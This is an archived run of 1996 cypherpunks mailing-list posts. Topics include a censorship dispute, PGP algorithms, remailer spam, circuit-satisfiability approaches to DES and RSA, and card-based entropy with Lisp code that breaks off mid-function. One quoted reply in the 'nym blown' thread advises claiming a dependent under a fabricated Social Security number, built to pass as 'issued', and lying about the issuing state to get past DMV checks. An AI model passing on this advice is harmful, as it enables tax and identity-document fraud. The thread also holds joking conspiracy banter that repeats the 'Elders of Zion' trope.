Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611141831.KAA20729@kachina.jetcafe.org>
Message-ID: <199611141839.MAA01024@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dave Hayes wrote:
> Igor "Gadzooks" Chudov writes:
> > Dave Hayes wrote:
> > > You won't do this, because I won't let you on the list. I, unlike you
> > > or Mr. Gilmore, have the judgement on whom to invite to my list.
> > So what's the difference between yours and gilmore's position?
> 
> Simple. I choose whom to invite to my parties. Gilmore provides an
> open door.

Providing an open door does not mean that it is always open to everyone, 
Dave. It only means that it is open to all by default, but that policy
can be reversed for certain individuals. That is not to say that I agree
with Gilmore's the decision to kick Vulis out from cypherpunks, but John's
decision was neither dishonorable nor he was acting outside his powers,
in my opinion.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 14 Nov 1996 13:14:08 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <v03007813aeb0506ae6a3@[206.119.69.46]>
Message-ID: <Pine.3.89.9611141346.A16468-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Robert Hettinga wrote:

> At 10:43 pm -0500 11/13/96, Lucky Green wrote:
> >I agree. Support for soon to be patent free algrithms is a good thing. I
> >hope that in version 4.0, after the users had time to migrate to
> >DSS/ElGamal, PGP will fully move away from RSA.
> 
> Speaking of patent-free, :-), can you do blind signatures without RSA?

Yes, but you still need to license the blind signature patent itself.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 13:19:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: take me off your mailing list
Message-ID: <199611142118.NAA15875@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 PM 11/13/96 -0500, CLERK PHILLIP G ROBERTS wrote:
>unsubcribe cypherpunks
>
I sent this individual the appropiate address copied from the new subscriber
mailings distributed by the Majordomo bot on sign up.  I also noted the
spelling error for him that has often been mentioned in this list, assuming
that that might have been his trouble in the first place.  Any wagers on how
many posts it will take before he gets it right?  Any motions to petition
for an alias for the command minus the s?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 13:20:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: [noise] Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611142119.NAA15883@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 AM 11/14/96 -0800, Richard Charles Graves wrote:
>hyperlex@hol.gr ("George A. Stathis") wrote:
>>
>>>> Mr. Gilmore, and other like minded parties, might want to consider
>>>> what would happen if one parent company owned *all* communications
>>>> media. Would they they be so supportive of the ideology of ownership
>>>> and communciation they espouse?
>>>
>>>And just how plausible do you think this is?  I believe it is next to
>>>impossible, unless it is the result of government regulation.
>>
>>Man you're nutts. There are very few and quite vast Media Companies
>>in the world, and they're on the verge of becoming monopolies.
>>
>>Even your American President is in reality a puppet of the Trilateral
>>Commission, who effectively also control CNN, the Washington Post,
>>and many many many other things all over the world.
>
>You're so naive. The Trilateral Commission is just a puppet of General
>Electric, the British Royal Family, the Illuminati, the Council on Foreign
>Relations, the Elders of Zion, the Knights Templar, the Military-
>Industrial Complex, the Communists, the Secret Government, Dead White
>Males, the Freemasons, the CIA, Scientology, and my Aunt Marge.

Big deal, the General Electric, the British Royal Family, the Illuminati,
the Council on Foreign Relations, the Elders of Zion, the Knights Templar,
the Military-Industrial Complex, the Communists, the Secret Government, Dead
White Males, the Freemasons, the CIA, and Scientology are all controlled by
Greys.  Your Aunt Marge, however, is controlled by the lizard people,(or the
giant preying mantises, whichever came in on the last grey shuttle.)
By the way, they also control, AT&T, MCI, Sprint, FedEx, the U.S. Postal
Service, McDonalds, and the professors at Stanford.  Now you know why they
all act like aliens.  P.S.  If you are a professor, don't come by my house,
I've got a captured alien energy weapon, actually I think it's a wound
cautizer of some type, but it makes a good weapon.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 14 Nov 1996 11:43:11 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611141857.KAA20984@kachina.jetcafe.org>
Message-ID: <328B75D1.10A@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Hayes wrote:
>
>  Symbolically, he punched holes in his ideology. That's my
> opinion.

Note that this is only true if John's ideology in the first placed
was what you think it was.  He may have "punched holes" in the
conception of John's ideology that you'd formed in your own mind,
of course.

Thus, John's actions punched no holes in my ideology, since such an
action always has had a perfectly respectable place there.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 14 Nov 1996 04:44:22 -0800 (PST)
To: rah@shipwright.com
Subject: Re: PGP3.0 & ElGamal
Message-ID: <199611141245.NAA25756@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 10:43 pm -0500 11/13/96, Lucky Green wrote:
> >I agree. Support for soon to be patent free algrithms is a good thing. I
> >hope that in version 4.0, after the users had time to migrate to
> >DSS/ElGamal, PGP will fully move away from RSA.
> 
> Speaking of patent-free, :-), can you do blind signatures without RSA?

I think it is possible using the both Diffie-Hellman and the RPK algorithm
(developed by the New Zealand chap quite recently), although patents
probably apply to the latter algorithm.

Don't forget that for ecash style systems, only the *client* needs to
do the blinding, not the bank.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kyle Rogers" <keroger@odin.cmp.ilstu.edu>
Date: Thu, 14 Nov 1996 11:44:04 -0800 (PST)
To: "Black Unicorn" <unicorn@schloss.li>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <9611141942.AA77098@odin.cmp.ilstu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In this post you talk about SSN web pages?  I was wondering if someone
could post a URL to one?

thanks

MaINLinE

----------
> From: Black Unicorn <unicorn@schloss.li>
> To: Timothy C. May <tcmay@got.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
> Date: Wednesday, November 13, 1996 2:51 PM
> 
> On Tue, 12 Nov 1996, Timothy C. May wrote:
> 
> > At 8:26 AM -0800 11/11/96, Hal Finney wrote:
> > 
> > >I have two kids entering their teens, and I'm sure other list members
are
> > >parents as well.  What can we do for our children to help them enter
their
> > >adult lives with better chances to retain privacy?  Unicorn mentions
keeping
> > >them absent from school on picture day, although I'm not sure how much
this
> > >helps.  I suppose it makes it harder for an investigator to find out
what
> > >they look(ed) like.  Then when they get old enough to drive you have a
new
> > >problem avoiding the photo (and thumbprint) on the license.
> > >
> > >Are there other measures which parents could take while their children
are
> > >young to get them off to a good start, privacy-wise?
> > 
> > I think there are two important domains of privacy to distinguish:
> > 
> > 1. The mundane.
> > 
> > 2, The political.
> > 
> > The mundane domain is what most people think of initially, Things like
"How
> > do I keep my name out of the system?" Or the point about kids.
> > 
> > The fact is, hundreds of millions of names are obviously--and almost
> > unavoidably--in the mundane public sector. I say "almost unavoidably"
> > because driver's licenses and social security numbers are ubiquitous.
> > 
> > (Side note: Jim McCoy's suggestion that kids can be kept off the
> > parental-unit's tax returns and thus not get a SS number is fraught
with
> > problems. Many schools--including public schools--use the SS number for
> > various internal and tracking reasons. Even if the kid is free of SS
> > numbers until he's a teenager--at a cost of thousands of dollars a year
in
> > IRS deductions not taken--he'll essentially have to have an SS number
in
> > his high school years, for a variety of reasons. Maybe this can be
avoided,
> > but I doubt the reward is worth the hassles.)
> 
> Personally, I suggest that the dependent be identified with an erronious
> SSN number.  If the dependent exists it is hard to make a fraud case and
> the deductions are usually allowed anyhow.
> 
> I'm not sure what "a variety of reasons" in the highschool years is.  As
> for hastles, I can't think of what they might be, other than going to the
> SSN web page to construct a properly formatted number which the SSA will
> report as "Issued" (as opposed to "Unissued").  This is one of the few
> pieces of information that is given out.
> 
> Again, DMVs cannot check to see that the number matches the name, only if
> it was issued and if the first three digits correspond to location where
> the number was supposedly "issued" from.  (If not one can always claim to
> have lived in the state that DID issue that number).
> 
> > The second category is that of the political domain. If a person can
> > separate himself from the comments he makes, as Alois^H^H^H^H^H Black
> > Unicorn has done, then it hardly matters--in an important sense--that
his
> > True Name has a SS number on file somewhere.
> 
> I disagree.
> The lack of a social security number makes the first part easier.  They
> are most certainly connected in the research into the few clues that will
> have to slip out, will not lead back to any fact which can be later used
> to narrow down the field.  (The first three numbers of a SSN for
example).
> 
> > This is an important distinction in discussing privacy, I think. If I
had a
> > rug rat, I doubt I'd go to great lengths to avoid getting him or her an
SS
> > number. If the Feds offered me a yearly savings of $1000 or more on my
> > taxes, I'd take it.
> 
> Pity, but still, you can avoid it without sacrificing the dependent
> deduction.
> 
> > (Given that it's almost an inevitability that the kid would have to
"enter
> > the system" at about the age where it really begins to matter, e.g, the
age
> > at which he or she begins to have political beliefs.)
> 
> I don't understand why this is so.  Perhaps I missed a link in the chain
> here?
> 
> --
> Forward complaints to : European Association of Envelope Manufactures
> Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
> Vote Monarchist         Switzerland
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 14:00:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <Pine.GSO.3.95.961114070057.11045F-100000@well.com>
Message-ID: <328B967F.5478@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> What is "censoring other people's censorship?" Say I argue in favor of 
> the CDA. Would you censor me then? Why not? Isn't this censoring 
> others censorship?
> 
> I wonder why the so-called "Freedom Knights" are so insecure in their
> beliefs that they will not tolerate a dissenting voice on their 
> mailing list. (Let's forget for the moment that my point in 
> subscribing was to disrupt it. That's not the point, is it? "More
> speech, more speech!")

Declan, why won't you let me on the so-called fight-censorship list? 
Just asking.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 14 Nov 1996 14:15:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censor John Gilmore -- EFF is a disgrace! [NOISE] [NEEDLESS TO SAY]
In-Reply-To: <199611141440.IAA06766@mailhost.onramp.net>
Message-ID: <328B99EE.8D3@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


aga wrote:
> 
> On Wed, 13 Nov 1996, Declan McCullagh wrote:
> 
> > I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale
> > of meaningless political rants.

You've got a low tolerance. I'd only give him a 7.

> Jealousy rears it's ugly head.  You just wish you had the credibility
> that Dave Hayes has.

Wow.

> This Declan_McCullagh is a long-time cabal.member, so his critique
> of a Freedom-Knight like Dave Hayes is to be given short shrift.

Wrong. The Cabal (TINC) voted en masse against rec.music.white-powder;
Declan took your side, and even violated the fascist Cabal Rules by 
distributing a marked ballot on a closed mailing list. He's been on the 
Cabal (TINC) shit list (TINSH) ever since.

> None of that analogy is applicable to the cyberpunks list.
> When a list gets as big as that, it it no longer to be considered
> a "mailing-list" but it is a _public_ forum.  The whole problem
> here is the abuse of power by both the EFF and John Gilmore.

Then why are you still posting? I thought The Cabal (TINC) had ordered 
you into the Gulag.

> No, he is saying that people can use an e-mail filter and not listen
> to Vulis if they want to.  It was a very simple thing; are you too
> uneducated to know how to use an e-mail filter?

No, I can assure you that he does.

Love,

-rich
 netscum, http://www.mindspring.com/~netscum/gravesr0.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Willis <jmwillis@yooper.switch.rockwell.com>
Date: Thu, 14 Nov 1996 12:15:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse Solutions
Message-ID: <328B7E1E.529B@switch.rockwell.com>
MIME-Version: 1.0
Content-Type: text/plain


> X-Sender: ph@netcom15.netcom.com
>  Mime-Version: 1.0
>  Date: Tue, 12 Nov 1996 17:07:41 -0800
>  To: cypherpunks@toad.com
>  From: ph@netcom.com (Peter Hendrickson)
>  Subject: Remailer Abuse Solutions
>  Sender: owner-cypherpunks@toad.com
>  Precedence: bulk
> 
> What do you do if you are operating a remailer and somebody complains
>  they are getting spammed?  That's easy, you keep a list of people that
>  you don't send mail to.  What's hard is if that person wants to receive
>  other anonymous mail.

...
 
>  This also eliminates the spam problem generally.  If you are plagued
>  by spam, create a list of names you will accept mail from.  When a
>  message comes in that is not on the list, return a message directing
>  them to send you the mail through a paying remailer.
> 

...

>  The solution: don't accept anonymous mail.  Only people on the "approved"
>  list would be allowed to post.  People who wish to post anonymously
>  could then send mail through the paying remailer to people on the
>  "approved" list and request that their message be relayed.  Most people
>  on the list would be happy to accept a dollar or two to provide this
>  service.  This would eliminate inappropriate mail while allowing anybody
>  to post.
> 


I don't know if this has been covered before...

Why not incorporate an approved senders list function in mail readers? 
(Or at least
accomodate a plug-in?)

Have the mail reader keep a history of all addresses ever mailed to. 
These will automatically be approved, unless you later delete them from
the list.

If you are on a listserv of whatever nature and you want to receive mail
from list readers off the list, have the mail reader update the approved
list by querying (when?) the addresses of those on the list.

If you post to a usenet group, and you want off-group mail from the
group's readers, have the mail reader grab a list of addresses of people
who have posted on that newsgroup.

Continue to use a kill file to kill the spammers from listserv and
usenet address sources.

These are just general suggestions which could hooked up as options by
mailing list, newsgroup, etc.

What do you think?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 14 Nov 1996 14:21:05 -0800 (PST)
To: eli@gs160.sp.cs.cmu.edu
Subject: Re: FCPUNX:Small "Hard" Problems Wanted
Message-ID: <199611142220.OAA23433@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@gs160.sp.cs.cmu.edu> writes:

 > (I'm getting this this through fcpunks, so my reply is
 > going to you. If you reply, you can cc cypherpunks if you
 > want.)

Ok.

[snip]

 >> ... I plan to test it on reduced round DES, full 16 round
 >> DES, and some RSA problems of various sizes.

 > These are all in NP (though not necessarily NP-C), so you
 > can certainly solve them with SAT, but I'd be *very*
 > surprised if SAT were an efficient way to do it.  If
 > SAT-reduction beats the number field sieve at factoring, for
 > example, you've got a major research result.

Actually, I would expect any AI algorithm which has some notion
of convergence to beat all of the "combination of congruences"
factoring methods, which are essentially exhaustive searches,
albeit it under the image of some useful transformations and
homomorphisms.

SAT (boolean satisfiability) does not seem to illuminate
factoring or other cyptographic problems in any obvious way. Even
a prime implicant covering of a typical strong cryptographic
function would be mondo huge in terms of memory.  Crypto problems
map pretty nicely into circuit problems, however, and circuit
satisfiability seems to be a nice wedge with which to attack a
number of the most popular ones.  Of course, you can go back and
forth between circuit and SAT problems, but thinking in terms of
circuits allows you to add the correct additional variables to a
problem which would be gigantic if you did the output directly in
terms of the input bits.

I will wait to see if this thing munches through DES of various
rounds before claiming any "research results."

 >> I already have C code to map RSA and n-round DES problems
 >> into an appropriate circuit satisfiability problem

 > How big a SAT problem does an n-bit RSA or n-round DES
 > problem turn into?

Well - the typical DES S-Box requires between 130-155 2-input
logical operations to express its 4 bit output in terms of its 6
bit input if you basically construct it in the obvious no-brainer
way without attempting any clever optimization.

Throw in a few XORs, and you can wire 2 round DES in about 2,500
one and two input logical operations, and the full 16 round DES
takes about 25,000.  I'm sure this can be improved upon greatly,
if someone wanted to tweek the wiring diagram.

What I've done to convert DES to a circuit satisfiability problem
is to make a logical network with (56+64+64) input bits and 1
output bit. The input consists of (key,plaintext,ciphertext).  I
pass both the plaintext and ciphertext through the IP, and do
half the rounds on each with the appropriate subkeys.  Then I XOR
opposite 32 bit sections between them, OR it all together, and
complement the output.

This yields something which lights up if the key maps the
provided plaintext into the provided ciphertext and outputs zero
otherwise.  When it is instantated with a particular
plaintext/ciphertext pair, this diagram can be munched by the
previously mentioned algorithm to yield a possibly non-empty set
of keys.

RSA is a little bit more messy.  Given a modulus between 2^k < N
< 2^(k-1), you can construct a circuit which when instantated
with the modulus bits will light up if and only if the larger
of the two distinct primes is input.  The way I do this requires
only two multiplicative operations, one being a modular
reciprocal of an odd number modulo 2^k, and the other being a
multiplication.  Both of these are wired as N^2 algorithms,
using successive approximation, although near-linear algorithms
probably exist.

As a data point, a circuit which lights up when RSA-140 is input
can be done in about a million NANDs.  Someone has offered me
some time on a 64 meg ultraSparc to try some RSA problems, but I
am going to debug the C version on DES first.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 14 Nov 1996 14:41:51 -0800 (PST)
To: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <v02140b05aeb13a70acf4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 11/14/1996, Mullen Patrick wrote:
>From: Peter Hendrickson on Thu, Nov 14, 1996 13:22
>> This assumes that spam has gotten so bad that everybody filters their
>> mail and only accepts mail on the "accept" list.  People sending mail
>> directly to your account would get a message back saying that they had
>> to get on the "free" list or send their mail through one of the approved
>> remailers.

> So our ideas on implementation are similar, except you have made the
> distinction that anyone on the "free" list can have direct access.
> Unfortunately, your idea pivots on the idea spam has exploded to unbearable
> proportions.  My complaint on this isn't your idea, it's the projection
> such an event may occur.

People complain all the time about advertising spam.

People have been maliciously spamming other people since the beginning
of time.  (The epoch here is the birth of the Net.)

The problem has arrived.  Right now it is merely irritating, but we
have already seen calls for more control and more legislation.  In my
view, that would be a disaster.  Let's head it off at the pass.

> While I hope this plan won't ever be necessary, at least not on such a
> global scale, the application of such techniques toward a mailing list
> sounds decent.

This may sound like a quibble, but it really isn't: I am not talking about
a global scale at all.  A very small group of people can make use of
this technology successfully.  It doesn't matter whether everybody in
the world uses it or just people who are tired of spam - it still works.

You only need one remailer operator to do this and it will be fully
available.

> I'm still thinking about how I would go about charging WRT mailing lists;
> anonymous postings are puzzling me at the moment.

I was probably a little quick on the keys.  Charging to send to a mailing
list does not solve the spam problem.  Why?  Because it is worth a dollar
to send an advertisement to 3000 people.  What it does do is cut down
on "me too" posts and encourage people to make the best use of the
bandwidth they are paying for.  It would be easy for a remailer operator
to do this if mail were accepted only from the "paying" remailer.

However, if you restrict postings to an approved group of people, perhaps
everybody on the mailing list, you can eliminate spam.  How, then, do we
allow anonymous postings to come through?  Individual people on the list
can receive the proposed post and forward it to the list if it is
appropriate.  They could even charge a fee for doing it.  That's easy to
do if there is a "paying" remailer which will handle the money for them.

> Which brings up another topic:  How would an anonymous remailer operate?
> It's hard to eliminate an audit trail when there is some monetary tie back
> to you, whether it be credit card, ecash (assuming they never quite figure
> out anonymizing it), ...

I assumed untraceable cash transactions for small amounts were available.

E-cash, the product licensed by Digicash, offers full payee anonymity and
would be an ideal candidate.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Thu, 14 Nov 1996 12:51:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Website: Bruce Schneier, Applied Cryptography, Blowfish,Counterpane
Message-ID: <v03007804aeb126a1d81f@[206.11.192.36]>
MIME-Version: 1.0
Content-Type: text/plain


I finally have a Website:

    http://www.counterpane.com

On the site I have information on Applied Cryptography, Blowfish,
Counterpane Systems consulting, and more.  The site has the latest errata,
information on ordering the book and source code disks, and the final copy
of "Why Cryptography is Harder Than it Looks."

If you have a website that mentions Bruce Schneier, Applied Cryptography,
Blowfish, or Counterpane Systems, please point to my website.  If you sell
or give away a product that uses Blowfish, please let me know so that I can
point to it.  If you are running an ftp server that has the Blowfish code
available, please tell me so that I can send people to you.

Thanks,
Bruce

**************************************************************************
* Bruce Schneier                 For information on APPLIED CRYPTOGRAPHY
* Counterpane Systems            2nd EDITION (15% discount and errata),
* schneier@counterpane.com       Counterpane Systems's consulting services,
* http://www.counterpane.com/    or the Blowfish algorithm, see my website.
**************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 14 Nov 1996 12:12:38 -0800 (PST)
To: "Peter Hendrickson" <ph@netcom.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <n1364137874.80685@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Peter Hendrickson on Thu, Nov 14, 1996 13:22
>This assumes that spam has gotten so bad that everybody filters their
>mail and only accepts mail on the "accept" list.  People sending mail
>directly to your account would get a message back saying that they had
>to get on the "free" list or send their mail through one of the approved
>remailers.

So our ideas on implementation are similar, except you have made the 
distinction that anyone on the "free" list can have direct access.  
Unfortunately, your idea pivots on the idea spam has exploded to unbearable
proportions.  My complaint on this isn't your idea, it's the projection
such an event may occur.  While I hope this plan won't ever be necessary,
at least not on such a global scale, the application of such techniques
toward a mailing list sounds decent.  I'm still thinking about how I would
go about charging WRT mailing lists;  anonymous postings are puzzling me
at the moment.  Which brings up another topic:  How would an anonymous
remailer operate?  It's hard to eliminate an audit trail when there is some
monetary tie back to you, whether it be credit card, ecash (assuming they
never quite figure out anonymizing it), ... 

PM 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 14 Nov 1996 15:14:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Playing Cards
Message-ID: <v02140b06aeb157d093c7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


A number of us have been concerned about how PGP generates entropy.
Striking the keyboard beats using time as a source of random numbers,
but the degree of entropy is not well understood.  Are there machines
where - for some reason - the keyboard strikes fall into some sort
of pattern?

And that's just when you are generating your public/private key pair.
What happens when you are just generating 128-bit keys for individual
messages?  Where is the entropy coming from?  I don't understand
completely, but somehow PGP collects entropy from the system and then
runs it into IDEA and then uses the numbers from the output.  When the
program is not running, a pool of this data is kept in randseed.bin.

We already know it's a problem because it is hard to understand what
it is even doing, much less determine if it is consistent with sound
engineering practice.

This problem is certainly not confined to PGP.  A lot of people have
worked hard to make computers deterministic.  What do you do when you
need entropy?

Yes, you can buy a chip which generates random numbers at nearly any
bandwidth you like.  But, right there you have a problem.  How do you
know the output is really random?  The answer is that you do not.

Playing cards are a nice source of randomness because they are widely
available and their behavior has been under study for a long time by
people with strong financial reasons for finding flaws.  I slightly
prefer cards to dice because dice may be slightly predictable or even
loaded.

It would be nice if cryptography software would allow you to enter
randomly selected playing cards from time to time to increase the
entropy of keys.  Careful people (Black Unicorn?) would enter the
cards prior to sending each message.

A well shuffled deck of 54 cards has about 237 bits of entropy.  This
is easy to use: the program asks the order of the cards, converts this
to a string, and runs it through a one-way hash.  (Entering the cards
is a bit of a nuisance.  Is there an easy way to have them read
automatically?)

The Economist reports that seven riffle shuffles bring a deck "very
close to being random".  ("Science and Technology: How to win at poker
and other science lessons" The Economist, October 12, 1996, pp:88-89.)

Cards have other uses.  You can assign a (large) number to each
configuration of the deck.  This allows you to use a deck of cards to
represent numbers.  That is certainly convenient for generating large
random numbers.  I have included some Lisp code below which converts
both ways between shuffled decks of cards and unique numbers.

This could be quite useful for strong steganography.  Let's say you
have 230 bits you want to deliver across a border.  It is unlikely
that anybody will study a deck of cards very carefully.  Of course,
you need not limit yourself to cards.  Any set of objects which can be
ordered will do the trick.  For instance, a shelf with 100 books may
be used to store 524 bits.  One thousand books may store 8529 bits.
How many bits can you store in that database which is in apparently
random order?

You can hide your data in two decks.  There is a natural order to
cards: pick your favorite ordering of the suits and then do the rest
numerically.  However, if you shuffle one deck of cards and lay them
in a row, you could use that ordering to define the mapping of the
second deck of cards to numbers.  The Enemy may seize one deck or the
other, but without both, the number will not be revealed.  While I
hesitate to use the term, this is a one-time pad.  The first deck can
be thought of as the key and the second deck is the message.

How the Lisp Code Works
-----------------------

Let's use as an example a deck of five cards numbered from 0 to 4.
There are 5! = 120 combinations of these cards.  We can think
of each card as a "digit" in a slightly odd numbering system.

In decimal arithmetic, we have columns whose value increments by 10^0,
10^1, 10^2, etc.  In our numbering system of five cards, columns
increment by 0, 1, 2!, 3!, and 4!.

Consider the card sequence of (4 3 2 1 0).  We wish to compute the
value stored in the leftmost column.  Since there are five choices of
cards, this divides the number of possible combinations into five
pieces of 4! combinations each.  So, in this example, the value in the
first column will be 4*4! = 96.  This leaves us with cards (3 2 1 0).
We can look at this as a smaller number represented by a deck of four
cards.  This smaller number is added later to the larger number to get
the final total number for our original deck.  The first column of our
smaller deck is 3*3! = 18.  The next one is 2*2! = 4, the one after
that is 1*1! = 1, and the last card never matters because there is
only one card to choose (0*0!).  The total is 96 + 18 + 4 + 1 = 119.
This is the highest number we can represent with a deck of five
cards.

Consider the card sequence (0 1 2 3 4).  This is the smallest value we
can represent, 0.  The value of the first column is 0*4! = 0.  This
leaves us with (1 2 3 4).  But what has happened here?  We can't treat
this as a normal smaller deck because it is missing a card.  Besides,
1*1! = 1, which is not the zero we expected.  We must renumber the
cards so that it is a reasonable deck again.  The sequence of cards we
should really be looking at is (0 1 2 3).  This means the value of the
next column should be 0*3!.  Then we renumber the deck and continue
until we run out of cards.  The answer is 0.

For an exercise, what is the value of (4 2 1 3 0)? (Answer at end.)

Now, how do we construct the deck given only the number defining its
combination?  The code below is recursive.  It computes the first
digit and then calls itself to recursively find the remaining cards.
The cards returned are always an internally consistent deck of cards;
that is, if sorted they will be consecutively numbered starting from
0.  When a new card is inserted, the cards have to be renumbered to
accomodate the new one by incrementing every card which has the same
or greater face value as the card being inserted.  (Insertion is
slightly misleading here because you place the card at the head of the
list.  Insertion refers to the conceptual process of inserting the
card into the pre-existing order and adjusting the other values to
allow it.)

In other languages, this might be a little more complicated to
implement.  Lisp provides a nice bignum package and also (I believe) a
compiler which knows how to convert the recursive routines below into
iterative routines.  This code performs quite well even on a small
slow machine.

;;;-*- Mode: Lisp; Package: COMMON-LISP-USER -*-

(defun compute-combination-number (cards)
  "Converts list of numbered cards into a unique number representing
their order."
  (cond ((> (length cards) 1)
         (+ (* (car cards)
               (factorial (1- (length cards))))
            (compute-combination-number (renumber-cards cards))))
        (t 0)))

(defun renumber-cards (cards)
  "Removes lead card from deck, decrements higher numbered cards
by one so there are no gaps."
  (let ((renumbered-cards-reversed)
        (lead-card (car cards)))
    (dolist (card (cdr cards))
      (cond ((> card lead-card)
             (push (1- card) renumbered-cards-reversed))
            (t
             (push card renumbered-cards-reversed))))
    (reverse renumbered-cards-reversed)))

(defun reconstruct-deck (combination-number deck-size)
  "Converts unique number representing order of a deck of cards
and returns a list of numbers representing the deck."
  (cond ((not (<= deck-size 1))
         (multiple-value-bind (digit remaining-combination-number)
                              (floor combination-number
                                     (factorial (1- deck-size)))
           (insert-card digit (reconstruct-deck
                               remaining-combination-number
                               (1- deck-size)))))
        (t (list 0))))

(defun insert-card (new-card card-list)
  "Inserts a card into a deck, increasing by one every card which
is of higher or equal number so there are no duplicate cards."
  (let ((new-deck-reversed))
    (push new-card new-deck-reversed)
    (dolist (card card-list)
      (cond ((>= card new-card)
             (push (1+ card) new-deck-reversed))
            (t
             (push card new-deck-reversed))))
    (reverse new-deck-reversed)))

(defun factorial (number)
  (cond ((or (= number 1) (= number 0)) 1)
        (t (* number (factorial (1- number))))))

;;; Testing routines

(defun shuffle-deck (deck-size)
  (randomize-list (build-card-list deck-size)))

(defun randomize-list (some-list)
  (do ((randomized-list nil))
      ((null some-list) randomized-list)
    (let ((item-number (random (length some-list))))
      (push (elt some-list item-number)
            randomized-list)
      (setf some-list
            (remove (elt some-list item-number) some-list)))))

(defun build-card-list (deck-size)
  "Returns a list of consecutive numbers representing a deck of
cards."
  (do ((card-list nil)
       (count 0 (1+ count)))
      ((= deck-size count) card-list)
    (push count card-list)))

(defun identicalp (list-one list-two)
  "Returns non-nil if the two lists are identical."
  (eval (cons 'and (map 'list #'equal list-one list-two))))

(defun exhaustively-test-card-combinations (deck-size)
  "Verifies that the correct deck is reconstructed from the unique
order number for every combination of a small deck of cards."
  (let ((combinations (factorial deck-size)))
    (do ((combo-number 0 (1+ combo-number)))
        ((= combinations combo-number) t)
      (cond ((not (= (compute-combination-number
                      (reconstruct-deck combo-number deck-size))
                     combo-number))
             (warn "Test failed for ~D" combo-number))))))

(defun test-one-deck (deck-size)
  "Shuffles a deck of cards and verifies that it may be reconstructed
from the unique number representing its order."
  (let* ((original-deck (shuffle-deck deck-size))
         (reconstructed-deck (reconstruct-deck
                              (compute-combination-number original-deck)
                              deck-size)))
    (cond ((not (identicalp original-deck reconstructed-deck))
           (warn "Test failed for ~A" original-deck)))))

(defun test-many-decks (trials max-deck-size)
